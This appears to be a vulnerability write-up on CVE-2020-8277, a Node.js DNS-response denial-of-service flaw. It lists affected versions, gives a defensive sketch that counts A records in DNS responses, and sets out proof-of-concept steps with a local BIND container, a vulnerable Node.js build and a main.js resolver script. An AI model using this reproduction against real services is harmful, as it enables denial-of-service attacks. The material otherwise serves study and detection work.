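The Node.js project recently published a security release announcement disclosing a high-severity denial-of-service vulnerability (CVE-2020-8277) in the corresponding Node.js versions of the v12.x, v14.x and v15.x release lines. An affected Node.js application allows an attacker to send DNS requests to the target host and to exploit the application's parsing of a large number of DNS records in the responses to carry out a denial-of-service attack against that host.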
Affected versions:
- Node.js 12.x: 12.16.3-12.19.1
- Node.js 14.x: 14.13.0-14.15.1
- Node.js 15.x: all versions
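For detection, the sketch below (an added example, not code from the PoC repository or from Node.js) parses a raw DNS response message and counts its A records, so that a sensor can flag answers carrying unusually many records, which is the condition the advisory describes. The function names, the sample packet and the threshold value are assumptions made for illustration.

```javascript
// Added example: count the A records in a raw DNS response (RFC 1035 wire format).

// Skip an encoded domain name starting at `off`; return the offset just past it.
function skipName(buf, off) {
  for (;;) {
    if (off >= buf.length) throw new RangeError('truncated name');
    const len = buf[off];
    if (len === 0) return off + 1;               // root label ends the name
    if ((len & 0xc0) === 0xc0) return off + 2;   // compression pointer ends the name
    off += len + 1;                              // ordinary label
  }
}

// maxARecords is a site-chosen alert threshold (an assumption, not a value from the page).
function inspectDnsResponse(buf, maxARecords) {
  if (buf.length < 12) throw new RangeError('truncated header');
  const flags = buf.readUInt16BE(2);
  const qdcount = buf.readUInt16BE(4);
  const ancount = buf.readUInt16BE(6);
  let off = 12;
  for (let i = 0; i < qdcount; i++) off = skipName(buf, off) + 4; // QTYPE + QCLASS
  let aRecords = 0;
  for (let i = 0; i < ancount; i++) {
    off = skipName(buf, off);
    if (off + 10 > buf.length) throw new RangeError('truncated record');
    const type = buf.readUInt16BE(off);
    const rdlength = buf.readUInt16BE(off + 8);
    off += 10 + rdlength;                        // fixed fields plus RDATA
    if (off > buf.length) throw new RangeError('truncated rdata');
    if (type === 1) aRecords++;                  // TYPE 1 = A
  }
  return {
    isResponse: (flags & 0x8000) !== 0,          // QR bit
    truncated: (flags & 0x0200) !== 0,           // TC bit: client retries over TCP
    ancount,
    aRecords,
    suspicious: aRecords > maxARecords,
  };
}

// Constructed sample: a response for "a.example" carrying three A records.
const SAMPLE = Buffer.from(
  '123481800001000300000000' + '0161076578616d706c6500' + '00010001' +
  'c00c000100010000003c0004c0000201' +
  'c00c000100010000003c0004c0000202' +
  'c00c000100010000003c0004c0000203', 'hex');

console.log(inspectDnsResponse(SAMPLE, 2));
```

The input is the DNS message itself; for DNS over TCP, strip the two-byte length prefix before calling `inspectDnsResponse`.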
Quick Run:
# clone this repository
$ git clone https://github.com/masahiro331/CVE-2020-8277
$ cd CVE-2020-8277
# build and run bind
$ docker build -t bind-local ./bind
# TCP fallback is needed, so publish port 53 on both TCP and UDP
$ docker run --rm --name bind -it -p 53:53 -p 53:53/udp bind-local
# use a Node.js version "< v15.2.1"
# If your installed version is a fixed one, build node from source.
$ git clone https://github.com/nodejs/node
$ cd node
$ git checkout df211208c0
$ ./configure
$ make -j8
$ make install
$ cd ..
# Run PoC
$ node main.js
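main.js:
// const SegfaultHandler = require('segfault-handler');
// SegfaultHandler.registerHandler('crash.log');
const { Resolver } = require('dns');

// Query the local bind container started above.
const resolver = new Resolver();
resolver.setServers(['127.0.0.1']);

let x = 0;
resolver.resolve4('safe.masahiro331.com', (err, addresses) => {
  // On failure `addresses` is undefined, so report the error and stop.
  if (err) {
    console.log(err);
    return;
  }
  // Print the first 1000 entries of the returned address list.
  while (x < 1000) {
    console.log(x);
    console.log(addresses[x]);
    x += 1;
  }
  console.log(err);
});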
ref:
https://github.com/masahiro331/CVE-2020-8277